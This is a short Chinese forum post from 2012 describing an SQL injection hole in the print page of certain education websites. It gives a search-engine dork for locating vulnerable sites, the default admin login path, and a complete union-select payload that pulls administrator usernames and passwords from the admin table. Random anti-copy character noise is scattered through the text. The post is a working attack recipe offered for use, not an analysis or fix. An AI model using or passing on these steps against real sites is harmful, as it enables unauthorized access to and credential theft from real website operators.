教育站打印页面漏洞
, v1 t; d! ]4 j& K8 Z2 G- q百度或google搜索 inurl:info_Print.asp?ArticleID=, l5 k5 K1 ?7 G9 ]& A, x
默认后台:/ad_login.asp
! A0 O! F7 h6 I. r爆管理员密码:
% [2 _: V% {: C$ n在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
, N( X+ Q+ p1 w( q% i3 L1 v1 w' u' t/ P4 _3 K
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
) C2 j0 I" V8 \5 J: h3 A$ t
# t6 e4 E" u' z. j作者:佚名 / e. `4 D" @; H: Q! Z- P+ m
$ B+ ^( g7 o1 {. b
. X, Y* H& u$ G' U; \
|
发表于 2012-10-31 08:37:31
收藏
支持
反对